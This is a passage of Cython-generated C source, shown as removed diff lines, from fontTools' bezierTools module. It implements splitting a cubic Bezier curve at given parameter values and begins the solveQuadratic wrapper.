__pyx_v_d = __Pyx_PyComplex_As___pyx_t_double_complex(values[3]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 778, __pyx_L3_error) - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_splitCubicAtTC", 0, 4, 4, __pyx_nargs); __PYX_ERR(0, 763, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_CLEAR(__pyx_v_ts); - __Pyx_AddTraceback("fontTools.misc.bezierTools._splitCubicAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_43_splitCubicAtTC(__pyx_self, __pyx_v_a, __pyx_v_b, __pyx_v_c, __pyx_v_d, __pyx_v_ts); - - /* function exit code */ - __Pyx_DECREF(__pyx_v_ts); - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_43_splitCubicAtTC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_a, __pyx_t_double_complex __pyx_v_b, __pyx_t_double_complex __pyx_v_c, __pyx_t_double_complex __pyx_v_d, PyObject *__pyx_v_ts) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *__pyx_cur_scope; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_splitCubicAtTC", 0); - __pyx_cur_scope = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC, __pyx_empty_tuple, NULL); - if (unlikely(!__pyx_cur_scope)) { - __pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *)Py_None); - __Pyx_INCREF(Py_None); - __PYX_ERR(0, 763, __pyx_L1_error) - } else { - __Pyx_GOTREF((PyObject *)__pyx_cur_scope); - } - __pyx_cur_scope->__pyx_v_a = __pyx_v_a; - __pyx_cur_scope->__pyx_v_b = __pyx_v_b; - __pyx_cur_scope->__pyx_v_c = __pyx_v_c; - __pyx_cur_scope->__pyx_v_d = __pyx_v_d; - __pyx_cur_scope->__pyx_v_ts = __pyx_v_ts; - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_ts); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_ts); - { - __pyx_CoroutineObject *gen = __Pyx_Generator_New((__pyx_coroutine_body_t) __pyx_gb_9fontTools_4misc_11bezierTools_45generator1, __pyx_codeobj__3, (PyObject *) __pyx_cur_scope, __pyx_n_s_splitCubicAtTC_2, __pyx_n_s_splitCubicAtTC_2, __pyx_n_s_fontTools_misc_bezierTools); if (unlikely(!gen)) __PYX_ERR(0, 763, __pyx_L1_error) - __Pyx_DECREF(__pyx_cur_scope); - __Pyx_RefNannyFinishContext(); - return (PyObject *) gen; - } - - /* function exit code */ - __pyx_L1_error:; - __Pyx_AddTraceback("fontTools.misc.bezierTools._splitCubicAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __Pyx_DECREF((PyObject *)__pyx_cur_scope); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_45generator1(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value) /* generator body */ -{ - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *__pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *)__pyx_generator->closure); - PyObject *__pyx_r = NULL; - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - int __pyx_t_3; - Py_ssize_t __pyx_t_4; - PyObject *(*__pyx_t_5)(PyObject *); - double __pyx_t_6; - PyObject *__pyx_t_7 = NULL; - PyObject *__pyx_t_8 = NULL; - PyObject *__pyx_t_9 = NULL; - PyObject *__pyx_t_10 = NULL; - PyObject *__pyx_t_11 = NULL; - PyObject *(*__pyx_t_12)(PyObject *); - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_splitCubicAtTC", 0); - switch (__pyx_generator->resume_label) { - case 0: goto __pyx_L3_first_run; - case 1: goto __pyx_L8_resume_from_yield; - default: /* CPython raises the right error here */ - __Pyx_RefNannyFinishContext(); - return NULL; - } - __pyx_L3_first_run:; - if (unlikely(!__pyx_sent_value)) __PYX_ERR(0, 763, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":779 - * ) - * def _splitCubicAtTC(a, b, c, d, *ts): - * ts = list(ts) # <<<<<<<<<<<<<< - * ts.insert(0, 0.0) - * ts.append(1.0) - */ - __pyx_t_1 = PySequence_List(__pyx_cur_scope->__pyx_v_ts); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 779, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GOTREF(__pyx_cur_scope->__pyx_v_ts); - __Pyx_DECREF_SET(__pyx_cur_scope->__pyx_v_ts, __pyx_t_1); - __Pyx_GIVEREF(__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":780 - * def _splitCubicAtTC(a, b, c, d, *ts): - * ts = list(ts) - * ts.insert(0, 0.0) # <<<<<<<<<<<<<< - * ts.append(1.0) - * for i in range(len(ts) - 1): - */ - __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_cur_scope->__pyx_v_ts, __pyx_n_s_insert); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 780, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_tuple__2, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 780, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":781 - * ts = list(ts) - * ts.insert(0, 0.0) - * ts.append(1.0) # <<<<<<<<<<<<<< - * for i in range(len(ts) - 1): - * t1 = ts[i] - */ - __pyx_t_3 = __Pyx_PyObject_Append(__pyx_cur_scope->__pyx_v_ts, __pyx_float_1_0); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(0, 781, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":782 - * ts.insert(0, 0.0) - * ts.append(1.0) - * for i in range(len(ts) - 1): # <<<<<<<<<<<<<< - * t1 = ts[i] - * t2 = ts[i + 1] - */ - __pyx_t_4 = PyObject_Length(__pyx_cur_scope->__pyx_v_ts); if (unlikely(__pyx_t_4 == ((Py_ssize_t)-1))) __PYX_ERR(0, 782, __pyx_L1_error) - __pyx_t_2 = PyInt_FromSsize_t((__pyx_t_4 - 1)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 782, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = __Pyx_PyObject_CallOneArg(__pyx_builtin_range, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 782, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - if (likely(PyList_CheckExact(__pyx_t_1)) || PyTuple_CheckExact(__pyx_t_1)) { - __pyx_t_2 = __pyx_t_1; __Pyx_INCREF(__pyx_t_2); - __pyx_t_4 = 0; - __pyx_t_5 = NULL; - } else { - __pyx_t_4 = -1; __pyx_t_2 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 782, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 782, __pyx_L1_error) - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - for (;;) { - if (likely(!__pyx_t_5)) { - if (likely(PyList_CheckExact(__pyx_t_2))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_2); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 782, __pyx_L1_error) - #endif - if (__pyx_t_4 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_1 = PyList_GET_ITEM(__pyx_t_2, __pyx_t_4); __Pyx_INCREF(__pyx_t_1); __pyx_t_4++; if (unlikely((0 < 0))) __PYX_ERR(0, 782, __pyx_L1_error) - #else - __pyx_t_1 = __Pyx_PySequence_ITEM(__pyx_t_2, __pyx_t_4); __pyx_t_4++; if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 782, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_2); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 782, __pyx_L1_error) - #endif - if (__pyx_t_4 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_1 = PyTuple_GET_ITEM(__pyx_t_2, __pyx_t_4); __Pyx_INCREF(__pyx_t_1); __pyx_t_4++; if (unlikely((0 < 0))) __PYX_ERR(0, 782, __pyx_L1_error) - #else - __pyx_t_1 = __Pyx_PySequence_ITEM(__pyx_t_2, __pyx_t_4); __pyx_t_4++; if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 782, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } - } else { - __pyx_t_1 = __pyx_t_5(__pyx_t_2); - if (unlikely(!__pyx_t_1)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 782, __pyx_L1_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_1); - } - __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_i); - __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_i, __pyx_t_1); - __Pyx_GIVEREF(__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":783 - * ts.append(1.0) - * for i in range(len(ts) - 1): - * t1 = ts[i] # <<<<<<<<<<<<<< - * t2 = ts[i + 1] - * delta = t2 - t1 - */ - __pyx_t_1 = __Pyx_PyObject_GetItem(__pyx_cur_scope->__pyx_v_ts, __pyx_cur_scope->__pyx_v_i); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 783, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_6 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_6 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 783, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_cur_scope->__pyx_v_t1 = __pyx_t_6; - - /* "fontTools/misc/bezierTools.py":784 - * for i in range(len(ts) - 1): - * t1 = ts[i] - * t2 = ts[i + 1] # <<<<<<<<<<<<<< - * delta = t2 - t1 - * - */ - __pyx_t_1 = __Pyx_PyInt_AddObjC(__pyx_cur_scope->__pyx_v_i, __pyx_int_1, 1, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 784, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_7 = __Pyx_PyObject_GetItem(__pyx_cur_scope->__pyx_v_ts, __pyx_t_1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 784, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_6 = __pyx_PyFloat_AsDouble(__pyx_t_7); if (unlikely((__pyx_t_6 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 784, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_cur_scope->__pyx_v_t2 = __pyx_t_6; - - /* "fontTools/misc/bezierTools.py":785 - * t1 = ts[i] - * t2 = ts[i + 1] - * delta = t2 - t1 # <<<<<<<<<<<<<< - * - * delta_2 = delta * delta - */ - __pyx_cur_scope->__pyx_v_delta = (__pyx_cur_scope->__pyx_v_t2 - __pyx_cur_scope->__pyx_v_t1); - - /* "fontTools/misc/bezierTools.py":787 - * delta = t2 - t1 - * - * delta_2 = delta * delta # <<<<<<<<<<<<<< - * delta_3 = delta * delta_2 - * t1_2 = t1 * t1 - */ - __pyx_cur_scope->__pyx_v_delta_2 = (__pyx_cur_scope->__pyx_v_delta * __pyx_cur_scope->__pyx_v_delta); - - /* "fontTools/misc/bezierTools.py":788 - * - * delta_2 = delta * delta - * delta_3 = delta * delta_2 # <<<<<<<<<<<<<< - * t1_2 = t1 * t1 - * t1_3 = t1 * t1_2 - */ - __pyx_cur_scope->__pyx_v_delta_3 = (__pyx_cur_scope->__pyx_v_delta * __pyx_cur_scope->__pyx_v_delta_2); - - /* "fontTools/misc/bezierTools.py":789 - * delta_2 = delta * delta - * delta_3 = delta * delta_2 - * t1_2 = t1 * t1 # <<<<<<<<<<<<<< - * t1_3 = t1 * t1_2 - * - */ - __pyx_cur_scope->__pyx_v_t1_2 = (__pyx_cur_scope->__pyx_v_t1 * __pyx_cur_scope->__pyx_v_t1); - - /* "fontTools/misc/bezierTools.py":790 - * delta_3 = delta * delta_2 - * t1_2 = t1 * t1 - * t1_3 = t1 * t1_2 # <<<<<<<<<<<<<< - * - * # calc new a, b, c and d - */ - __pyx_cur_scope->__pyx_v_t1_3 = (__pyx_cur_scope->__pyx_v_t1 * __pyx_cur_scope->__pyx_v_t1_2); - - /* "fontTools/misc/bezierTools.py":793 - * - * # calc new a, b, c and d - * a1 = a * delta_3 # <<<<<<<<<<<<<< - * b1 = (3 * a * t1 + b) * delta_2 - * c1 = (2 * b * t1 + c + 3 * a * t1_2) * delta - */ - __pyx_cur_scope->__pyx_v_a1 = __Pyx_c_prod_double(__pyx_cur_scope->__pyx_v_a, __pyx_t_double_complex_from_parts(__pyx_cur_scope->__pyx_v_delta_3, 0)); - - /* "fontTools/misc/bezierTools.py":794 - * # calc new a, b, c and d - * a1 = a * delta_3 - * b1 = (3 * a * t1 + b) * delta_2 # <<<<<<<<<<<<<< - * c1 = (2 * b * t1 + c + 3 * a * t1_2) * delta - * d1 = a * t1_3 + b * t1_2 + c * t1 + d - */ - __pyx_cur_scope->__pyx_v_b1 = __Pyx_c_prod_double(__Pyx_c_sum_double(__Pyx_c_prod_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(3, 0), __pyx_cur_scope->__pyx_v_a), __pyx_t_double_complex_from_parts(__pyx_cur_scope->__pyx_v_t1, 0)), __pyx_cur_scope->__pyx_v_b), __pyx_t_double_complex_from_parts(__pyx_cur_scope->__pyx_v_delta_2, 0)); - - /* "fontTools/misc/bezierTools.py":795 - * a1 = a * delta_3 - * b1 = (3 * a * t1 + b) * delta_2 - * c1 = (2 * b * t1 + c + 3 * a * t1_2) * delta # <<<<<<<<<<<<<< - * d1 = a * t1_3 + b * t1_2 + c * t1 + d - * pt1, pt2, pt3, pt4 = calcCubicPointsC(a1, b1, c1, d1) - */ - __pyx_cur_scope->__pyx_v_c1 = __Pyx_c_prod_double(__Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_prod_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(2, 0), __pyx_cur_scope->__pyx_v_b), __pyx_t_double_complex_from_parts(__pyx_cur_scope->__pyx_v_t1, 0)), __pyx_cur_scope->__pyx_v_c), __Pyx_c_prod_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(3, 0), __pyx_cur_scope->__pyx_v_a), __pyx_t_double_complex_from_parts(__pyx_cur_scope->__pyx_v_t1_2, 0))), __pyx_t_double_complex_from_parts(__pyx_cur_scope->__pyx_v_delta, 0)); - - /* "fontTools/misc/bezierTools.py":796 - * b1 = (3 * a * t1 + b) * delta_2 - * c1 = (2 * b * t1 + c + 3 * a * t1_2) * delta - * d1 = a * t1_3 + b * t1_2 + c * t1 + d # <<<<<<<<<<<<<< - * pt1, pt2, pt3, pt4 = calcCubicPointsC(a1, b1, c1, d1) - * yield (pt1, pt2, pt3, pt4) - */ - __pyx_cur_scope->__pyx_v_d1 = __Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_cur_scope->__pyx_v_a, __pyx_t_double_complex_from_parts(__pyx_cur_scope->__pyx_v_t1_3, 0)), __Pyx_c_prod_double(__pyx_cur_scope->__pyx_v_b, __pyx_t_double_complex_from_parts(__pyx_cur_scope->__pyx_v_t1_2, 0))), __Pyx_c_prod_double(__pyx_cur_scope->__pyx_v_c, __pyx_t_double_complex_from_parts(__pyx_cur_scope->__pyx_v_t1, 0))), __pyx_cur_scope->__pyx_v_d); - - /* "fontTools/misc/bezierTools.py":797 - * c1 = (2 * b * t1 + c + 3 * a * t1_2) * delta - * d1 = a * t1_3 + b * t1_2 + c * t1 + d - * pt1, pt2, pt3, pt4 = calcCubicPointsC(a1, b1, c1, d1) # <<<<<<<<<<<<<< - * yield (pt1, pt2, pt3, pt4) - * - */ - __pyx_t_7 = __pyx_f_9fontTools_4misc_11bezierTools_calcCubicPointsC(__pyx_cur_scope->__pyx_v_a1, __pyx_cur_scope->__pyx_v_b1, __pyx_cur_scope->__pyx_v_c1, __pyx_cur_scope->__pyx_v_d1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 797, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - if ((likely(PyTuple_CheckExact(__pyx_t_7))) || (PyList_CheckExact(__pyx_t_7))) { - PyObject* sequence = __pyx_t_7; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 4)) { - if (size > 4) __Pyx_RaiseTooManyValuesError(4); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 797, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_8 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_9 = PyTuple_GET_ITEM(sequence, 2); - __pyx_t_10 = PyTuple_GET_ITEM(sequence, 3); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_8 = PyList_GET_ITEM(sequence, 1); - __pyx_t_9 = PyList_GET_ITEM(sequence, 2); - __pyx_t_10 = PyList_GET_ITEM(sequence, 3); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_8); - __Pyx_INCREF(__pyx_t_9); - __Pyx_INCREF(__pyx_t_10); - #else - { - Py_ssize_t i; - PyObject** temps[4] = {&__pyx_t_1,&__pyx_t_8,&__pyx_t_9,&__pyx_t_10}; - for (i=0; i < 4; i++) { - PyObject* item = PySequence_ITEM(sequence, i); if (unlikely(!item)) __PYX_ERR(0, 797, __pyx_L1_error) - __Pyx_GOTREF(item); - *(temps[i]) = item; - } - } - #endif - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - } else { - Py_ssize_t index = -1; - PyObject** temps[4] = {&__pyx_t_1,&__pyx_t_8,&__pyx_t_9,&__pyx_t_10}; - __pyx_t_11 = PyObject_GetIter(__pyx_t_7); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 797, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_11); - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_12 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_11); - for (index=0; index < 4; index++) { - PyObject* item = __pyx_t_12(__pyx_t_11); if (unlikely(!item)) goto __pyx_L6_unpacking_failed; - __Pyx_GOTREF(item); - *(temps[index]) = item; - } - if (__Pyx_IternextUnpackEndCheck(__pyx_t_12(__pyx_t_11), 4) < 0) __PYX_ERR(0, 797, __pyx_L1_error) - __pyx_t_12 = NULL; - __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; - goto __pyx_L7_unpacking_done; - __pyx_L6_unpacking_failed:; - __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; - __pyx_t_12 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 797, __pyx_L1_error) - __pyx_L7_unpacking_done:; - } - __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_pt1); - __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_pt1, __pyx_t_1); - __Pyx_GIVEREF(__pyx_t_1); - __pyx_t_1 = 0; - __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_pt2); - __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_pt2, __pyx_t_8); - __Pyx_GIVEREF(__pyx_t_8); - __pyx_t_8 = 0; - __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_pt3); - __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_pt3, __pyx_t_9); - __Pyx_GIVEREF(__pyx_t_9); - __pyx_t_9 = 0; - __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_pt4); - __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_pt4, __pyx_t_10); - __Pyx_GIVEREF(__pyx_t_10); - __pyx_t_10 = 0; - - /* "fontTools/misc/bezierTools.py":798 - * d1 = a * t1_3 + b * t1_2 + c * t1 + d - * pt1, pt2, pt3, pt4 = calcCubicPointsC(a1, b1, c1, d1) - * yield (pt1, pt2, pt3, pt4) # <<<<<<<<<<<<<< - * - * - */ - __pyx_t_7 = PyTuple_New(4); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 798, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_pt1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_7, 0, __pyx_cur_scope->__pyx_v_pt1)) __PYX_ERR(0, 798, __pyx_L1_error); - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_pt2); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_pt2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_7, 1, __pyx_cur_scope->__pyx_v_pt2)) __PYX_ERR(0, 798, __pyx_L1_error); - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_pt3); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_pt3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_7, 2, __pyx_cur_scope->__pyx_v_pt3)) __PYX_ERR(0, 798, __pyx_L1_error); - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_pt4); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_pt4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_7, 3, __pyx_cur_scope->__pyx_v_pt4)) __PYX_ERR(0, 798, __pyx_L1_error); - __pyx_r = __pyx_t_7; - __pyx_t_7 = 0; - __Pyx_XGIVEREF(__pyx_t_2); - __pyx_cur_scope->__pyx_t_0 = __pyx_t_2; - __pyx_cur_scope->__pyx_t_1 = __pyx_t_4; - __pyx_cur_scope->__pyx_t_2 = __pyx_t_5; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - __Pyx_Coroutine_ResetAndClearException(__pyx_generator); - /* return from generator, yielding value */ - __pyx_generator->resume_label = 1; - return __pyx_r; - __pyx_L8_resume_from_yield:; - __pyx_t_2 = __pyx_cur_scope->__pyx_t_0; - __pyx_cur_scope->__pyx_t_0 = 0; - __Pyx_XGOTREF(__pyx_t_2); - __pyx_t_4 = __pyx_cur_scope->__pyx_t_1; - __pyx_t_5 = __pyx_cur_scope->__pyx_t_2; - if (unlikely(!__pyx_sent_value)) __PYX_ERR(0, 798, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":782 - * ts.insert(0, 0.0) - * ts.append(1.0) - * for i in range(len(ts) - 1): # <<<<<<<<<<<<<< - * t1 = ts[i] - * t2 = ts[i + 1] - */ - } - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - CYTHON_MAYBE_UNUSED_VAR(__pyx_cur_scope); - - /* "fontTools/misc/bezierTools.py":763 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * a=cython.complex, - * b=cython.complex, - */ - - /* function exit code */ - PyErr_SetNone(PyExc_StopIteration); - goto __pyx_L0; - __pyx_L1_error:; - __Pyx_Generator_Replace_StopIteration(0); - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_XDECREF(__pyx_t_9); - __Pyx_XDECREF(__pyx_t_10); - __Pyx_XDECREF(__pyx_t_11); - __Pyx_AddTraceback("_splitCubicAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_L0:; - __Pyx_XDECREF(__pyx_r); __pyx_r = 0; - #if !CYTHON_USE_EXC_INFO_STACK - __Pyx_Coroutine_ResetAndClearException(__pyx_generator); - #endif - __pyx_generator->resume_label = -1; - __Pyx_Coroutine_clear((PyObject*)__pyx_generator); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":808 - * - * - * def solveQuadratic(a, b, c, sqrt=sqrt): # <<<<<<<<<<<<<< - * """Solve a quadratic equation. - * - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_94__defaults__(CYTHON_UNUSED PyObject *__pyx_self) { - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("__defaults__", 1); - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyTuple_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 808, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__Pyx_CyFunction_Defaults(__pyx_defaults, __pyx_self)->__pyx_arg_sqrt); - __Pyx_GIVEREF(__Pyx_CyFunction_Defaults(__pyx_defaults, __pyx_self)->__pyx_arg_sqrt); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __Pyx_CyFunction_Defaults(__pyx_defaults, __pyx_self)->__pyx_arg_sqrt)) __PYX_ERR(0, 808, __pyx_L1_error); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 808, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_t_1)) __PYX_ERR(0, 808, __pyx_L1_error); - __Pyx_INCREF(Py_None); - __Pyx_GIVEREF(Py_None); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, Py_None)) __PYX_ERR(0, 808, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_r = __pyx_t_2; - __pyx_t_2 = 0; - goto __pyx_L0; - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_AddTraceback("fontTools.misc.bezierTools.__defaults__", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_47solveQuadratic(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_46solveQuadratic, "solveQuadratic(a, b, c, sqrt=sqrt)\nSolve a quadratic equation.\n\n Solves *a*x*x + b*x + c = 0* where a, b and c are real.\n\n 